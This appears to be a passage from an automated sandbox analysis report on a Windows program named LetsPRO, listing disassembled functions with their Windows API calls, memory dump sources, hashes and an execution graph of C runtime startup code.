                                          • Part of subcall function 03F43C80: TlsGetValue.KERNEL32(?,?,03F3F9DA,00000000), ref: 03F43C8E
                                        • ___fls_setvalue@8.LIBCMT ref: 03F3F9E8
                                          • Part of subcall function 03F43CD4: DecodePointer.KERNEL32(?,?,?,03F3F9ED,00000000,?,00000000), ref: 03F43CE5
                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 03F3F9F1
                                        • ExitThread.KERNEL32 ref: 03F3F9F8
                                        • GetCurrentThreadId.KERNEL32 ref: 03F3F9FE
                                        • __freefls@4.LIBCMT ref: 03F3FA1E
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                        • String ID:
                                        • API String ID: 781180411-0
                                        • Opcode ID: 5ef480ace4d927761ded85624f679203e0613cae72113616e76f053cc24c85d4
                                        • Instruction ID: 51d22edd96bd0b8191bc8da0b764c6f28db09ea1194f565b3a5cac0826acad04
                                        • Opcode Fuzzy Hash: 5ef480ace4d927761ded85624f679203e0613cae72113616e76f053cc24c85d4
                                        • Instruction Fuzzy Hash: 98E0B63DE0131A7BDF04B7B19E0999E7EACAD01192B258851EB15AB004EA28996187A6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F3D830 Relevance: 6.4, APIs: 5, Instructions: 140COMMON
                                        Download Yara Rule
                                        APIs
                                        • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000), ref: 03F3D868
                                        • IsBadReadPtr.KERNEL32(?,00000014), ref: 03F3D938
                                        • SetLastError.KERNEL32(0000007F), ref: 03F3D963
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Read$ErrorLast
                                        • String ID:
                                        • API String ID: 2715074504-0
                                        • Opcode ID: 9a637ab2d57b3eacd3ab0248f68be1a3d54213ce3e4696083b3f07a77b4bc9f1
                                        • Instruction ID: c45b96c2283ae958c95d0ac35555b757f74d1650b363bb32cf584279e8f3882f
                                        • Opcode Fuzzy Hash: 9a637ab2d57b3eacd3ab0248f68be1a3d54213ce3e4696083b3f07a77b4bc9f1
                                        • Instruction Fuzzy Hash: 29419971A0120AABEB10CF99D880A6AF7F9FF89314F1885A9E94997351D770F911CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F38020 Relevance: 6.1, APIs: 4, Instructions: 91stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: lstrlen$_memset
                                        • String ID:
                                        • API String ID: 2425037729-0
                                        • Opcode ID: f3ec3663cd1486ebaf724c8881cf0b31f0f13a66a98ed076c31d77374c2aaa49
                                        • Instruction ID: 1d1cd516a23f1c6d7a40cd51e8baac348da62087d1f89243954e845f9cec44fd
                                        • Opcode Fuzzy Hash: f3ec3663cd1486ebaf724c8881cf0b31f0f13a66a98ed076c31d77374c2aaa49
                                        • Instruction Fuzzy Hash: A5212BB6B002099BCF14DE68DC809FEB3A9EBC5790B29406DFD05C7221F7399D5986A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F34380 Relevance: 6.1, APIs: 4, Instructions: 70networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetLastError.KERNEL32(0000139F), ref: 03F343EC
                                          • Part of subcall function 03F313A0: HeapAlloc.KERNEL32(00000000,00000000,?,?,?,?), ref: 03F313CB
                                          • Part of subcall function 03F341E0: EnterCriticalSection.KERNEL32(03F34FB5,03F34E55,03F342BE,00000000,?,?,03F34E55,?,?,?,?,00000000,000000FF), ref: 03F341E8
                                          • Part of subcall function 03F341E0: LeaveCriticalSection.KERNEL32(03F34FB5,?,?,?,00000000,000000FF), ref: 03F341F6
                                          • Part of subcall function 03F34C70: HeapFree.KERNEL32(?,00000000,?,00000000,03F34E55,?,03F342C8,03F34E55,00000000,?,?,03F34E55,?), ref: 03F34C97
                                        • SetLastError.KERNEL32(00000000,?), ref: 03F343D7
                                        • SetLastError.KERNEL32(00000057), ref: 03F34401
                                        • WSAGetLastError.WS2_32(?), ref: 03F34410
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ErrorLast$CriticalHeapSection$AllocEnterFreeLeave
                                        • String ID:
                                        • API String ID: 2060118545-0
                                        • Opcode ID: e68de984075fc24770d1811d2b740ee58a923539596b8d89b1c2cd5d06675d3a
                                        • Instruction ID: 02d3cb69250a388548d20789323cfa16b6ea1a63fd717764bb0e71b0a2987c33
                                        • Opcode Fuzzy Hash: e68de984075fc24770d1811d2b740ee58a923539596b8d89b1c2cd5d06675d3a
                                        • Instruction Fuzzy Hash: 6F11CA3AA0561CAB9710FF7AF8445DEB7A8FF85332B0806B6ED0CD7200D731990146D1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F33BF0 Relevance: 6.1, APIs: 4, Instructions: 58networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WSAEventSelect.WS2_32(?,03F33ABB,00000023), ref: 03F33C02
                                        • WSAGetLastError.WS2_32 ref: 03F33C0D
                                        • send.WS2_32(?,00000000,00000000,00000000), ref: 03F33C58
                                        • WSAGetLastError.WS2_32 ref: 03F33C63
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ErrorLast$EventSelectsend
                                        • String ID:
                                        • API String ID: 259408233-0
                                        • Opcode ID: c91463382891d34a5b7b681589101e4b24853a399a60291b1fd4e0fd925b00e2
                                        • Instruction ID: 12df13d82ee66c54a41b634e80ecb0c044eebd38bceb4a3cd0ed376f1cca5441
                                        • Opcode Fuzzy Hash: c91463382891d34a5b7b681589101e4b24853a399a60291b1fd4e0fd925b00e2
                                        • Instruction Fuzzy Hash: 7D115EBAA00700ABD720DF79D888A5BB6E9BB89710F150A2EE656C7A80D735F4008B50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F341E0 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                        Download Yara Rule
                                        APIs
                                        • EnterCriticalSection.KERNEL32(03F34FB5,03F34E55,03F342BE,00000000,?,?,03F34E55,?,?,?,?,00000000,000000FF), ref: 03F341E8
                                        • LeaveCriticalSection.KERNEL32(03F34FB5,?,?,?,00000000,000000FF), ref: 03F341F6
                                        • LeaveCriticalSection.KERNEL32(03F34FB5), ref: 03F34257
                                        • SetEvent.KERNEL32(8520468B), ref: 03F34272
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CriticalSection$Leave$EnterEvent
                                        • String ID:
                                        • API String ID: 3394196147-0
                                        • Opcode ID: 7ee76bbe53c8c7b2dc077add9668e0d1781b3f74628485271d52c70340803a26
                                        • Instruction ID: 112efbdc7be458295411ee47c0a19eaa20e7edd3ed7b29e37bdc5cc9436e57ca
                                        • Opcode Fuzzy Hash: 7ee76bbe53c8c7b2dc077add9668e0d1781b3f74628485271d52c70340803a26
                                        • Instruction Fuzzy Hash: 251145B4A04B09AFD724CF75C584A96BBE9BF49300B14896DE55E87201EB30E801CB00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F34B00 Relevance: 6.0, APIs: 4, Instructions: 45timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • timeGetTime.WINMM(00000001,?,00000001,?,03F33C4F,?,?,00000001), ref: 03F34B15
                                        • InterlockedIncrement.KERNEL32(00000001), ref: 03F34B24
                                        • InterlockedIncrement.KERNEL32(00000001), ref: 03F34B31
                                        • timeGetTime.WINMM(?,03F33C4F,?,?,00000001), ref: 03F34B48
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: IncrementInterlockedTimetime
                                        • String ID:
                                        • API String ID: 159728177-0
                                        • Opcode ID: 7266338d0d2dc55f2a3f3a3e38a15c1f82e8f09b5bee4351e4e44983ab687d31
                                        • Instruction ID: 5f67b446708bf2814ecf75de134aad25eec0d4a714af11f90a2abe0050eb9b8b
                                        • Opcode Fuzzy Hash: 7266338d0d2dc55f2a3f3a3e38a15c1f82e8f09b5bee4351e4e44983ab687d31
                                        • Instruction Fuzzy Hash: 2C01DAB5600709AFC760EF7AD88094AFBFCAF59650710892EE549C7710E774E5448FE0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 025F3640 Relevance: 6.0, APIs: 4, Instructions: 42timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 025F3647
                                        • _free.LIBCMT ref: 025F367C
                                          • Part of subcall function 025F6F29: HeapFree.KERNEL32(00000000,00000000,?,025F996C,00000000,?,025FA030,00000000,00000001,00000000,?,025FC1C3,00000018,02607BF0,0000000C,025FC253), ref: 025F6F3F
                                          • Part of subcall function 025F6F29: GetLastError.KERNEL32(00000000,?,025F996C,00000000,?,025FA030,00000000,00000001,00000000,?,025FC1C3,00000018,02607BF0,0000000C,025FC253,00000000), ref: 025F6F51
                                        • _malloc.LIBCMT ref: 025F36B7
                                        • _memset.LIBCMT ref: 025F36C5
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CreateErrorFreeHeapLastTimerWaitable_free_malloc_memset
                                        • String ID:
                                        • API String ID: 3340475617-0
                                        • Opcode ID: 91e6fca63971bc2e7752b7032a7ea38fb267942229dc23a209deca0946aba9ec
                                        • Instruction ID: c095d6cd4764c1371cc3621522dc38c6e6b408edc2cfd2744ad61be46e52e021
                                        • Opcode Fuzzy Hash: 91e6fca63971bc2e7752b7032a7ea38fb267942229dc23a209deca0946aba9ec
                                        • Instruction Fuzzy Hash: F001C8B1900B459FE3609F7AD885B97BAE9FB85354F11482EE5AE87302D630A8048F64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F3B19D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 03F3BC70: GetDesktopWindow.USER32 ref: 03F3BC8F
                                          • Part of subcall function 03F3BC70: GetDC.USER32(00000000), ref: 03F3BC9C
                                          • Part of subcall function 03F3BC70: CreateCompatibleDC.GDI32(00000000), ref: 03F3BCA2
                                          • Part of subcall function 03F3BC70: GetDC.USER32(00000000), ref: 03F3BCAD
                                          • Part of subcall function 03F3BC70: GetDeviceCaps.GDI32(00000000,00000008), ref: 03F3BCBA
                                          • Part of subcall function 03F3BC70: GetDeviceCaps.GDI32(00000000,00000076), ref: 03F3BCC2
                                          • Part of subcall function 03F3BC70: ReleaseDC.USER32(00000000,00000000), ref: 03F3BCD3
                                          • Part of subcall function 03F3BC70: GetSystemMetrics.USER32(0000004C), ref: 03F3BD78
                                          • Part of subcall function 03F3BC70: GetSystemMetrics.USER32(0000004D), ref: 03F3BD8D
                                          • Part of subcall function 03F3BC70: CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 03F3BDA6
                                          • Part of subcall function 03F3BC70: SelectObject.GDI32(?,00000000), ref: 03F3BDB4
                                          • Part of subcall function 03F3BC70: SetStretchBltMode.GDI32(?,00000003), ref: 03F3BDC0
                                          • Part of subcall function 03F3BC70: GetSystemMetrics.USER32(0000004F), ref: 03F3BDCD
                                          • Part of subcall function 03F3BC70: GetSystemMetrics.USER32(0000004E), ref: 03F3BDE0
                                          • Part of subcall function 03F3F707: _malloc.LIBCMT ref: 03F3F721
                                        • _memset.LIBCMT ref: 03F3B1E1
                                        • swprintf.LIBCMT ref: 03F3B204
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: MetricsSystem$CapsCompatibleCreateDevice$BitmapDesktopModeObjectReleaseSelectStretchWindow_malloc_memsetswprintf
                                        • String ID: %s %s
                                        • API String ID: 1028806752-581060391
                                        • Opcode ID: a3d52118e4e9cbdae8abb44a3a8fd7a227a4cb04e2983e247f2c0a143ee61167
                                        • Instruction ID: ee0b9e720c92c987ad2834248e142132aeecc4b03eb60afcc9f5f49bc3061e4e
                                        • Opcode Fuzzy Hash: a3d52118e4e9cbdae8abb44a3a8fd7a227a4cb04e2983e247f2c0a143ee61167
                                        • Instruction Fuzzy Hash: 8F21E576A04340ABD211EF55DC81E5FB7E8EFDA710F08092EF9899B201E670D904C7A3
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F39100 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                        Download Yara Rule
                                        APIs
                                        • std::_Xinvalid_argument.LIBCPMT ref: 03F39115
                                          • Part of subcall function 03F3EF39: std::exception::exception.LIBCMT ref: 03F3EF4E
                                          • Part of subcall function 03F3EF39: __CxxThrowException@8.LIBCMT ref: 03F3EF63
                                          • Part of subcall function 03F3EF39: std::exception::exception.LIBCMT ref: 03F3EF74
                                        • std::_Xinvalid_argument.LIBCPMT ref: 03F39128
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                        • String ID: string too long
                                        • API String ID: 963545896-2556327735
                                        • Opcode ID: aa58e7bc989f4d9161638c3b9c68b6d91aac6e2d762c9d9bc8c0521d5300ea15
                                        • Instruction ID: f4b1deecc8ef34577f8817a2271573f4775f88619f7b35e53950508cb7dc0182
                                        • Opcode Fuzzy Hash: aa58e7bc989f4d9161638c3b9c68b6d91aac6e2d762c9d9bc8c0521d5300ea15
                                        • Instruction Fuzzy Hash: 0E11C1767047418BC321DE2CE804B1BBBE9ABE7621F140A6AE5D1DB781C7F2D804C3A4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F393F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                        Download Yara Rule
                                        APIs
                                        • __CxxThrowException@8.LIBCMT ref: 03F3941D
                                        • std::_Xinvalid_argument.LIBCPMT ref: 03F3944A
                                        Strings
                                        • invalid string position, xrefs: 03F39445
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Exception@8ThrowXinvalid_argumentstd::_
                                        • String ID: invalid string position
                                        • API String ID: 3614006799-1799206989
                                        • Opcode ID: a409fdb913b0891c2cc223362c3d6850ade0102c0a78b6c6b08805922877f70d
                                        • Instruction ID: 45bd5536b27c81bd90040a006d54772dfa92b9da1e80c3a605aa7e0d40c1179f
                                        • Opcode Fuzzy Hash: a409fdb913b0891c2cc223362c3d6850ade0102c0a78b6c6b08805922877f70d
                                        • Instruction Fuzzy Hash: A201D6336003145BD724EE7CDC80B9BF799AF42620F154A2DE5669F680D7F1E98487E1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F3F7BA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __output_l.LIBCMT ref: 03F3F815
                                          • Part of subcall function 03F3F91B: __getptd_noexit.LIBCMT ref: 03F3F91B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __getptd_noexit__output_l
                                        • String ID: B
                                        • API String ID: 2141734944-1255198513
                                        • Opcode ID: 5bc75878e19a99f8b3291bc09011d637415e77d2edc72ea821797cd9c84227ee
                                        • Instruction ID: 9bc0974bc6820c47e080340cbb71fe912a1f7d3ce7b237ea63cfbf574f981697
                                        • Opcode Fuzzy Hash: 5bc75878e19a99f8b3291bc09011d637415e77d2edc72ea821797cd9c84227ee
                                        • Instruction Fuzzy Hash: 82016D75D00349ABDF00DFA9DC01AEEBBB8EB05364F144166F924AA290E7789601CBB5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F3D1C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                        Download Yara Rule
                                        APIs
                                        • std::_Xinvalid_argument.LIBCPMT ref: 03F3D1D4
                                          • Part of subcall function 03F3EF39: std::exception::exception.LIBCMT ref: 03F3EF4E
                                          • Part of subcall function 03F3EF39: __CxxThrowException@8.LIBCMT ref: 03F3EF63
                                          • Part of subcall function 03F3EF39: std::exception::exception.LIBCMT ref: 03F3EF74
                                        • _memmove.LIBCMT ref: 03F3D20D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                        • String ID: vector<T> too long
                                        • API String ID: 1785806476-3788999226
                                        • Opcode ID: 640dbc06356d83653ff456d28307d03e9bd94dd7c7e1e80ca15f51e265324cda
                                        • Instruction ID: 94d1920c2a893c1449dd5397ccac9497f6c592ecaab4857ed768cbedb67e018b
                                        • Opcode Fuzzy Hash: 640dbc06356d83653ff456d28307d03e9bd94dd7c7e1e80ca15f51e265324cda
                                        • Instruction Fuzzy Hash: B7018877A0020A5FC704FE6DECA1C6E7798E661251349423AFC35D7608E7B4F815C791
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F506D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 03F5010A: __getptd.LIBCMT ref: 03F50110
                                          • Part of subcall function 03F5010A: __getptd.LIBCMT ref: 03F50120
                                        • __getptd.LIBCMT ref: 03F506E3
                                          • Part of subcall function 03F43E5B: __getptd_noexit.LIBCMT ref: 03F43E5E
                                          • Part of subcall function 03F43E5B: __amsg_exit.LIBCMT ref: 03F43E6B
                                        • __getptd.LIBCMT ref: 03F506F1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __getptd$__amsg_exit__getptd_noexit
                                        • String ID: csm
                                        • API String ID: 803148776-1018135373
                                        • Opcode ID: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
                                        • Instruction ID: 383b5f5cc8aab060a4955f987459076dd3be63afe7f58398b98dbc5020be2e89
                                        • Opcode Fuzzy Hash: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
                                        • Instruction Fuzzy Hash: AD018B38C01703CECF34DF60E8946ACB7BAAF00311F18486EE9495A250CF308590CF41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Execution Graph

                                        Execution Coverage:0%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:0%
                                        Total number of Nodes:59
                                        Total number of Limit Nodes:2
                                        execution_graph 66376 6c901e2c 66377 6c901e46 66376->66377 66378 6c901e3b 66376->66378 66436 6c90c89a GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 66377->66436 66382 6c901d6f 66378->66382 66381 6c90c895 66383 6c901d7b ___BuildCatchObject 66382->66383 66384 6c90b901 66383->66384 66385 6c901d87 66383->66385 66437 6c90b3a9 HeapCreate 66384->66437 66386 6c917b71 66385->66386 66387 6c901d91 66385->66387 66392 6c927488 _cexit 66386->66392 66393 6c917b8e 66386->66393 66408 6c917ba8 66386->66408 66389 6c902997 66387->66389 66390 6c901d9a 66387->66390 66405 6c901e01 ___BuildCatchObject 66389->66405 66441 6c902929 82 API calls __threadstart@4 66389->66441 66438 6c900371 TlsGetValue DecodePointer TlsSetValue 66390->66438 66391 6c90b906 66395 6c90b90e 66391->66395 66391->66408 66401 6c927492 66392->66401 66448 6c917b07 _initterm _initterm 66393->66448 66442 6c90ba64 97 API calls 3 library calls 66395->66442 66397 6c901d9f TlsGetValue 66407 6c901db3 66397->66407 66400 6c917b93 66400->66401 66404 6c917b9c 66400->66404 66453 6c976e58 78 API calls ___wtomb_environ 66401->66453 66403 6c90b913 66403->66408 66443 6c90b3a1 84 API calls _extend_ioinfo_arrays 66403->66443 66449 6c917bad 81 API calls 66404->66449 66405->66377 66407->66405 66412 6c901db7 66407->66412 66450 6c976e58 78 API calls ___wtomb_environ 66408->66450 66451 6c97679a HeapDestroy 66408->66451 66452 6c94c3a5 81 API calls ___wtomb_environ 66408->66452 66411 6c927497 66454 6c94c3a5 81 API calls ___wtomb_environ 66411->66454 66439 6c901e4c 77 API calls _extend_ioinfo_arrays 66412->66439 66415 6c90b920 66415->66408 66444 6c90b552 82 API calls 2 library calls 66415->66444 66418 6c92749c 66455 6c97679a HeapDestroy 66418->66455 66419 6c901dc3 66419->66408 66422 6c901dcf DecodePointer 66419->66422 66425 6c901de4 66422->66425 66423 6c90b92d GetCommandLineA GetCommandLineW 66445 6c90b8f6 _setmbcp 66423->66445 66427 6c9274a1 66425->66427 66428 6c901dec 66425->66428 66426 6c90b94d 66446 6c90b975 77 API calls 5 library calls 66426->66446 66456 6c90017e 77 API calls 2 library calls 66427->66456 66440 6c901ecb 77 API calls 4 library calls 66428->66440 66432 6c90b952 66432->66408 66447 6c90c477 89 API calls shared_ptr 66432->66447 66433 6c901df3 GetCurrentThreadId 66433->66405 66435 6c90b961 66435->66386 66435->66408 66436->66381 66437->66391 66438->66397 66439->66419 66440->66433 66441->66405 66442->66403 66443->66415 66444->66423 66445->66426 66446->66432 66447->66435 66448->66400 66449->66408 66450->66408 66451->66408 66452->66408 66453->66411 66454->66418 66455->66427 66456->66408

                                        Non-executed Functions

                                        Function 6C94A2E7 Relevance: 98.2, APIs: 38, Strings: 18, Instructions: 204libraryloaderCOMMONLIBRARYCODE
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,CreateUmsCompletionList,00000000,00000114,00000000,?,?,?,?,6C93BED5), ref: 6C94A303
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C94A30C
                                        • GetLastError.KERNEL32(?,?,?,?,6C93BED5), ref: 6C94A312
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,?,6C93BED5), ref: 6C94A32A
                                        • _CxxThrowException.MSVCR100(?,6C9A0D48,00000000,?,?,?,?,6C93BED5), ref: 6C94A338
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,DequeueUmsCompletionListItems,?,?,?,?,6C93BED5), ref: 6C94A351
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C94A354
                                        • GetLastError.KERNEL32(?,?,?,?,6C93BED5), ref: 6C94A35A
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,GetUmsCompletionListEvent,?,?,?,?,6C93BED5), ref: 6C94A37A
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C94A37D
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,ExecuteUmsThread,?,?,?,?,6C93BED5), ref: 6C94A397
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C94A39A
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,UmsThreadYield,?,?,?,?,6C93BED5), ref: 6C94A3B4
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C94A3B7
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,DeleteUmsCompletionList,?,?,?,?,6C93BED5), ref: 6C94A3D1
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C94A3D4
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,GetCurrentUmsThread,?,?,?,?,6C93BED5), ref: 6C94A3EE
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C94A3F1
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,GetNextUmsListItem,?,?,?,?,6C93BED5), ref: 6C94A40F
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C94A412
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,QueryUmsThreadInformation,?,?,?,?,6C93BED5), ref: 6C94A430
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C94A433
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,SetUmsThreadInformation,?,?,?,?,6C93BED5), ref: 6C94A451
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C94A454
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,DeleteUmsThreadContext,?,?,?,?,6C93BED5), ref: 6C94A472
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C94A475
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,CreateUmsThreadContext,?,?,?,?,6C93BED5), ref: 6C94A493
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C94A496
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,EnterUmsSchedulingMode,?,?,?,?,6C93BED5), ref: 6C94A4B4
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C94A4B7
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,CreateRemoteThreadEx,?,?,?,?,6C93BED5), ref: 6C94A4D5
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C94A4D8
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,InitializeProcThreadAttributeList,?,?,?,?,6C93BED5), ref: 6C94A4F6
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C94A4F9
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,UpdateProcThreadAttribute,?,?,?,?,6C93BED5), ref: 6C94A517
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C94A51A
